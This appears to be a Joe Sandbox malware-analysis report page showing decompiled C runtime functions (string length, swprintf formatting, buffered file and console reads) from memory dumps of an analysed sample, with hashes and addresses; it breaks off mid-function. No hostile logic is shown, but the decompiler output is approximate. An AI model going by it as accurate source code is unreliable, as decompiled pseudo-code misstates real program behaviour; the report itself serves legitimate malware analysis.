                                                          • Opcode ID: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction ID: 244d3da62b2419ffec7f2b83562d9ddaa1875d9bfdd12cecff67f453c29b3a35
                                                          • Opcode Fuzzy Hash: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction Fuzzy Hash: E9212B77814202DFDB246FA0ED55BE673EEEF40370FA4442AF520D7490E73599409790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B721D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 62%
                                                          			E009B721D(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E009BDBB1(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E009B22C8(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E009B5727(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E009AEB49(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x9ce400; // 0xbb40e64e
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E009B7973(_t30, _t40, __fp0, _t45,  &_v300);
								}
								_pop(_t46);
								return E009B1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}





















                                                          0x009b7224
                                                          0x009b722a
                                                          0x009b7235
                                                          0x009b723c
                                                          0x009b7249
                                                          0x009b724b
                                                          0x009b7250
                                                          0x009b7255
                                                          0x009b725b
                                                          0x009b7264
                                                          0x009b7269
                                                          0x009b726e
                                                          0x009b7276
                                                          0x009b7277
                                                          0x009b7278
                                                          0x009b7279
                                                          0x009b727a
                                                          0x009b727b
                                                          0x009b7280
                                                          0x009b7284
                                                          0x009b74b4
                                                          0x009b74b5
                                                          0x009b74bd
                                                          0x009b74c4
                                                          0x009b74c7
                                                          0x009b74cb
                                                          0x009b74d1
                                                          0x009b74fc
                                                          0x009b7502
                                                          0x009b750c
                                                          0x009b7515
                                                          0x009b7270
                                                          0x009b7270
                                                          0x00000000
                                                          0x009b7270
                                                          0x009b7257
                                                          0x009b7257
                                                          0x00000000
                                                          0x009b7257
                                                          0x009b723e
                                                          0x009b723e
                                                          0x009b7258
                                                          0x009b725a
                                                          0x009b725a
                                                          0x009b7226
                                                          0x009b7229
                                                          0x009b7229

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcsnlen
                                                          • String ID: U
                                                          • API String ID: 3628947076-3372436214
                                                          • Opcode ID: 2059437075a7f913f1c66ce3cd2a6e132816ed78907c9c8627bfdff5f5fb1e61
                                                          • Instruction ID: 73efd427173ec298428934771baec82c7c632a7b1cd68bab81f4b1dadacd6e9b
                                                          • Opcode Fuzzy Hash: 2059437075a7f913f1c66ce3cd2a6e132816ed78907c9c8627bfdff5f5fb1e61
                                                          • Instruction Fuzzy Hash: 5421EB3160C1087EEB109AE49E46FFAB3ACDBC5770F504665F918C6190FA61DE008690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A414C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xae2088; // 0x75c00f1c
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = L00A37707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = L00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = L00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A02340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                          0x00a414c0
                                                          0x00a414cb
                                                          0x00a414d2
                                                          0x00a414d6
                                                          0x00a414da
                                                          0x00a414de
                                                          0x00a414e3
                                                          0x00a4157a
                                                          0x00a4157a
                                                          0x00a414f1
                                                          0x00a414f3
                                                          0x00a6ea0f
                                                          0x00000000
                                                          0x00a6ea15
                                                          0x00000000
                                                          0x00a6ea15
                                                          0x00a414f9
                                                          0x00a414f9
                                                          0x00a414fe
                                                          0x00a41504
                                                          0x00a6ea1a
                                                          0x00a6ea1f
                                                          0x00a6ea21
                                                          0x00a6ea22
                                                          0x00a6ea27
                                                          0x00a6ea2a
                                                          0x00a6ea2a
                                                          0x00a41515
                                                          0x00a41517
                                                          0x00a4156d
                                                          0x00a41572
                                                          0x00a41575
                                                          0x00a41575
                                                          0x00a4151e
                                                          0x00a6ea50
                                                          0x00a6ea55
                                                          0x00a6ea58
                                                          0x00a6ea58
                                                          0x00a4152e
                                                          0x00a41531
                                                          0x00a41533
                                                          0x00000000
                                                          0x00a41535
                                                          0x00a41541
                                                          0x00a41549
                                                          0x00a41549
                                                          0x00a41533
                                                          0x00a414f3
                                                          0x00a41559

                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 00A6EA22
                                                            • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
                                                            • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490
                                                          • ___swprintf_l.LIBCMT ref: 00A4156D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                          • Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
                                                          • Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                          • Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009AE4CA Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E009AE4CA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E009AE740(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E009AF572(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E009AE740(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E009AF100())) = 0x22;
												L4:
												E009AEB1E();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E009AF693(_t119));
											_t88 = E009AF84A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E009AF6B7(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E009AF100())) = 0x16;
				goto L4;
			}




























                                                          0x009ae4d4
                                                          0x009ae4d7
                                                          0x009ae4dd
                                                          0x009ae4e0
                                                          0x009ae4e3
                                                          0x009ae500
                                                          0x00000000
                                                          0x009ae500
                                                          0x009ae4e5
                                                          0x009ae4ea
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae4ee
                                                          0x009ae509
                                                          0x009ae50c
                                                          0x009ae50e
                                                          0x009ae51c
                                                          0x009ae51c
                                                          0x009ae520
                                                          0x009ae528
                                                          0x009ae52d
                                                          0x009ae52d
                                                          0x009ae530
                                                          0x009ae532
                                                          0x00000000
                                                          0x009ae534
                                                          0x009ae534
                                                          0x009ae53c
                                                          0x009ae53e
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae540
                                                          0x009ae543
                                                          0x009ae546
                                                          0x009ae54d
                                                          0x009ae54f
                                                          0x009ae556
                                                          0x009ae551
                                                          0x009ae551
                                                          0x009ae551
                                                          0x009ae55b
                                                          0x009ae55e
                                                          0x009ae560
                                                          0x009ae649
                                                          0x00000000
                                                          0x009ae566
                                                          0x009ae566
                                                          0x009ae566
                                                          0x009ae56d
                                                          0x009ae5ae
                                                          0x009ae5ae
                                                          0x009ae5b0
                                                          0x009ae61b
                                                          0x009ae621
                                                          0x009ae624
                                                          0x009ae67b
                                                          0x00000000
                                                          0x009ae681
                                                          0x009ae626
                                                          0x009ae629
                                                          0x009ae62b
                                                          0x009ae651
                                                          0x009ae651
                                                          0x009ae655
                                                          0x009ae65f
                                                          0x009ae664
                                                          0x009ae66c
                                                          0x009ae4fb
                                                          0x009ae4fb
                                                          0x00000000
                                                          0x009ae4fb
                                                          0x009ae62d
                                                          0x009ae630
                                                          0x009ae633
                                                          0x009ae634
                                                          0x009ae637
                                                          0x009ae637
                                                          0x009ae638
                                                          0x009ae63b
                                                          0x009ae63e
                                                          0x00000000
                                                          0x009ae63e
                                                          0x009ae5b2
                                                          0x009ae5b4
                                                          0x009ae5d8
                                                          0x009ae5dd
                                                          0x009ae5e3
                                                          0x009ae5e5
                                                          0x009ae5e5
                                                          0x009ae5b6
                                                          0x009ae5b8
                                                          0x009ae5be
                                                          0x009ae5d0
                                                          0x009ae5d0
                                                          0x009ae5d0
                                                          0x009ae5d2
                                                          0x009ae5c0
                                                          0x009ae5c5
                                                          0x009ae5c7
                                                          0x009ae5c7
                                                          0x009ae5d4
                                                          0x009ae5d4
                                                          0x009ae5e7
                                                          0x009ae5ea
                                                          0x00000000
                                                          0x009ae5ec
                                                          0x009ae5ec
                                                          0x009ae5ed
                                                          0x009ae5f7
                                                          0x009ae5f8
                                                          0x009ae5fd
                                                          0x009ae600
                                                          0x009ae602
                                                          0x009ae689
                                                          0x00000000
                                                          0x009ae689
                                                          0x009ae608
                                                          0x009ae60b
                                                          0x009ae677
                                                          0x009ae677
                                                          0x009ae677
                                                          0x009ae677
                                                          0x00000000
                                                          0x009ae677
                                                          0x009ae60d
                                                          0x009ae60d
                                                          0x009ae60f
                                                          0x009ae60f
                                                          0x009ae612
                                                          0x009ae615
                                                          0x00000000
                                                          0x009ae615
                                                          0x009ae5ea
                                                          0x009ae56f
                                                          0x009ae572
                                                          0x009ae575
                                                          0x009ae577
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae579
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae57f
                                                          0x009ae581
                                                          0x009ae583
                                                          0x009ae585
                                                          0x009ae585
                                                          0x009ae588
                                                          0x009ae58b
                                                          0x009ae58d
                                                          0x00000000
                                                          0x009ae593
                                                          0x009ae59a
                                                          0x009ae59f
                                                          0x009ae5a2
                                                          0x009ae5a5
                                                          0x009ae5a8
                                                          0x009ae5aa
                                                          0x00000000
                                                          0x009ae5aa
                                                          0x009ae641
                                                          0x009ae641
                                                          0x009ae641
                                                          0x00000000
                                                          0x009ae566
                                                          0x009ae560
                                                          0x009ae532
                                                          0x009ae515
                                                          0x009ae518
                                                          0x009ae51a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae51a
                                                          0x009ae4f0
                                                          0x009ae4f5
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 5fdde417556b5480242da2ac3e102494601d3f47f1c02e04318f7146ed66b739
                                                          • Instruction ID: caf1a86da483b6d82a2ba1a17679e1ed2f350771cc86c9dba7a5160017a99b48
                                                          • Opcode Fuzzy Hash: 5fdde417556b5480242da2ac3e102494601d3f47f1c02e04318f7146ed66b739
                                                          • Instruction Fuzzy Hash: D451B230E00705DBDF249FA9988466EB7A9AF53324F248B29F826962D0E775DD508BD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A28A2 Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E009A28A2(signed int __ebx, signed int __ecx, signed int __esi) {
				signed char _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t253;
				void* _t254;
				void* _t255;
				signed int _t256;
				signed int _t258;
				long _t259;
				char* _t261;
				signed char _t265;
				signed char _t266;
				signed int _t267;
				signed int _t268;
				signed char _t269;
				signed int _t277;
				intOrPtr _t278;
				void* _t280;
				void* _t281;
				void* _t282;
				void* _t283;
				signed int _t287;
				void* _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t294;
				void* _t296;
				signed char _t297;
				signed int _t298;
				signed char _t299;
				signed int _t300;
				signed int _t302;
				signed int _t313;
				char _t314;
				char _t315;
				signed int _t317;
				void* _t318;
				signed char _t319;
				signed int _t327;
				intOrPtr _t328;
				void* _t330;
				void* _t331;
				void* _t332;
				signed int _t334;
				signed int _t335;
				void* _t336;
				long _t338;
				void _t346;
				void _t349;
				signed int _t355;
				signed int _t357;
				char* _t358;
				signed int _t359;
				void* _t360;
				intOrPtr _t362;
				signed int _t363;
				signed int _t368;
				long _t369;
				void* _t370;
				intOrPtr _t371;
				char _t374;
				signed int _t376;
				void* _t377;
				intOrPtr _t378;
				signed int _t380;
				void* _t383;
				intOrPtr _t384;
				intOrPtr _t387;
				char _t388;
				intOrPtr _t389;
				intOrPtr _t390;
				signed int _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				signed int _t396;
				void _t399;
				void* _t400;
				void* _t401;
				signed int _t403;
				signed short* _t406;
				signed int _t407;
				void* _t410;
				char* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed char* _t422;
				int _t423;
				signed int _t424;
				void* _t426;
				void* _t428;

				_t415 = __esi;
				_t359 = __ecx;
				_t355 = __ebx;
				 *((char*)(_t426 + 0x13)) = 0x8100009a;
				if(0xffffffff81000099 == 0) {
					_t247 =  !__esi;
					__eflags = _t247 & 0x00000001;
					if((_t247 & 0x00000001) == 0) {
						goto L2;
					} else {
						_t415 = __esi >> 1;
						__eflags = _t415 - 4;
						if(_t415 < 4) {
							_t415 = 4;
						}
						_t252 = E009B22C8(_t389, _t415);
						 *(_t426 - 0x10) = _t252;
						_pop(_t360);
						__eflags = _t252;
						if(__eflags != 0) {
							_t253 = E009B3F56(_t360, __eflags,  *((intOrPtr*)(_t426 + 8)), 0, 0, 1);
							_t428 = _t428 + 0x10;
							_t362 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
							 *((intOrPtr*)(_t362 + _t355 + 0x28)) = _t253;
							_t254 =  *(_t426 - 0x10);
							 *((intOrPtr*)(_t362 + _t355 + 0x2c)) = _t389;
							_t359 =  *(_t426 - 0xc);
							goto L14;
						} else {
							 *((intOrPtr*)(E009AF100())) = 0xc;
							_t250 = E009AF0CC();
							 *_t250 = 8;
							goto L162;
						}
					}
				} else {
					if(0xffffffff81000098 != 0) {
						L7:
						_t254 =  *(_t426 + 0xc);
						 *(_t426 - 0x10) = _t254;
						L14:
						_t390 =  *((intOrPtr*)(0x9cf230 + _t359 * 4));
						_t363 =  *(_t426 - 0xc);
						 *(_t426 - 0x1c) = _t254;
						if(( *(_t390 + _t355 + 4) & 0x00000048) != 0) {
							_t399 =  *((intOrPtr*)(_t390 + _t355 + 5));
							if(_t399 != 0xa && _t415 != 0) {
								 *_t254 = _t399;
								_t29 = _t254 + 1; // 0x9b2b48
								_t400 = _t29;
								_t403 = 1;
								_t415 = _t415 - 1;
								 *(_t426 - 0x1c) = _t400;
								 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 5)) = 0xa;
								if( *((char*)(_t426 + 0x13)) != 0) {
									_t39 = _t355 + 0x25; // 0x45c60975
									_t346 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t39));
									if(_t346 != 0xa && _t415 != 0) {
										 *_t400 = _t346;
										_t401 = _t400 + 1;
										_t415 = _t415 - 1;
										 *(_t426 - 0x1c) = _t401;
										_t403 = 2;
										 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x25)) = 0xa;
										if( *((char*)(_t426 + 0x13)) == 1) {
											_t349 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26));
											if(_t349 != 0xa && _t415 != 0) {
												 *_t401 = _t349;
												_t415 = _t415 - 1;
												_t403 = 3;
												_t388 = 0xa;
												 *(_t426 - 0x1c) = _t401 + 1;
												 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26)) = _t388;
											}
										}
									}
								}
							}
						}
						_t255 = E009B3924( *((intOrPtr*)(_t426 + 8)));
						_t256 =  *(_t426 - 0xc);
						if(_t255 == 0) {
							L35:
							_t258 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t256 * 4)) + _t355),  *(_t426 - 0x1c), _t415, _t426 - 0x14, 0);
							__eflags = _t258;
							if(_t258 == 0) {
								L157:
								_t259 = GetLastError();
								_t417 = 5;
								__eflags = _t259 - _t417;
								if(_t259 != _t417) {
									__eflags = _t259 - 0x6d;
									if(_t259 != 0x6d) {
										goto L30;
									}
									_t357 = 0;
									goto L32;
								}
								 *((intOrPtr*)(E009AF100())) = 9;
								 *(E009AF0CC()) = _t417;
								goto L31;
							}
							_t368 =  *(_t426 - 0x14);
							__eflags = _t368;
							if(_t368 < 0) {
								goto L157;
							}
							__eflags = _t368 - _t415;
							if(_t368 > _t415) {
								goto L157;
							}
							goto L38;
						} else {
							_t387 =  *((intOrPtr*)(0x9cf230 + _t256 * 4));
							if(( *(_t387 + _t355 + 4) & 0x00000080) == 0) {
								goto L35;
							}
							_t338 = GetConsoleMode( *(_t387 + _t355), _t426 - 0x20);
							 *(_t426 - 0x20) = _t338;
							if(_t338 == 0 ||  *((char*)(_t426 + 0x13)) != 2) {
								_t256 =  *(_t426 - 0xc);
								goto L35;
							} else {
								if(ReadConsoleW( *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355),  *(_t426 - 0x1c), _t415 >> 1, _t426 - 0x14, 0) != 0) {
									_t368 =  *(_t426 - 0x14) +  *(_t426 - 0x14);
									 *(_t426 - 0x14) = _t368;
									L38:
									_t391 =  *(_t426 - 0xc);
									_t403 = _t403 + _t368;
									_t418 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
									_t88 = _t355 + 4; // 0x840ffff8
									_t265 =  *((intOrPtr*)(_t418 + _t88));
									__eflags = _t265;
									if(_t265 >= 0) {
										L98:
										_t261 =  *(_t426 - 0x10);
										L99:
										_t357 =  *(_t426 - 0x18);
										0x74a7428b();
										L101:
										if(_t261 !=  *(_t426 + 0xc)) {
											E009B2248(_t261);
										}
										if(_t357 != 0xfffffffe) {
											_t403 = _t357;
										}
										_t251 = _t403;
										L163:
										return _t251;
									}
									__eflags =  *((char*)(_t426 + 0x13)) - 2;
									if( *((char*)(_t426 + 0x13)) == 2) {
										__eflags =  *(_t426 - 0x20);
										if( *(_t426 - 0x20) == 0) {
											__eflags = _t368;
											if(_t368 == 0) {
												L124:
												_t266 = _t265 & 0x000000fb;
												__eflags = _t266;
												L125:
												 *(_t418 + _t355 + 4) = _t266;
												_t267 =  *(_t426 - 0x10);
												_t419 = _t267;
												 *(_t426 - 0x28) = _t267;
												_t369 = _t267 + _t403;
												 *(_t426 - 0x20) = _t369;
												__eflags = _t267 - _t369;
												if(_t267 >= _t369) {
													L156:
													_t261 =  *(_t426 - 0x10);
													_t403 = _t419 - _t261;
													goto L99;
												}
												_t370 = 0xd;
												 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
												_t406 = _t267;
												while(1) {
													_t268 =  *_t406 & 0x0000ffff;
													__eflags = _t268 -  *((intOrPtr*)(_t426 + 0x10));
													if(_t268 ==  *((intOrPtr*)(_t426 + 0x10))) {
														break;
													}
													__eflags = _t268 - _t370;
													if(_t268 == _t370) {
														__eflags = _t406 -  *(_t426 - 0x20) + 0xfffffffe;
														if(_t406 >=  *(_t426 - 0x20) + 0xfffffffe) {
															_t406 =  &(_t406[1]);
															_t277 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355), _t426 - 8, 2, _t426 - 0x14, 0);
															__eflags = _t277;
															if(_t277 != 0) {
																L137:
																__eflags =  *(_t426 - 0x14);
																if( *(_t426 - 0x14) == 0) {
																	L152:
																	_t391 =  *(_t426 - 0xc);
																	_t370 = 0xd;
																	 *_t419 = _t370;
																	_t419 = _t419 + 2;
																	L144:
																	__eflags = _t406 -  *(_t426 - 0x20);
																	if(_t406 <  *(_t426 - 0x20)) {
																		continue;
																	}
																	goto L156;
																}
																_t391 =  *(_t426 - 0xc);
																_t278 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
																__eflags =  *(_t278 + _t355 + 4) & 0x00000048;
																if(( *(_t278 + _t355 + 4) & 0x00000048) == 0) {
																	__eflags = _t419 -  *(_t426 - 0x10);
																	if(__eflags != 0) {
																		L149:
																		E009B3F56(_t370, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xfffffffe, 0xffffffff, 1);
																		_t391 =  *(_t426 - 0xc);
																		_t428 = _t428 + 0x10;
																		_t280 = 0xa;
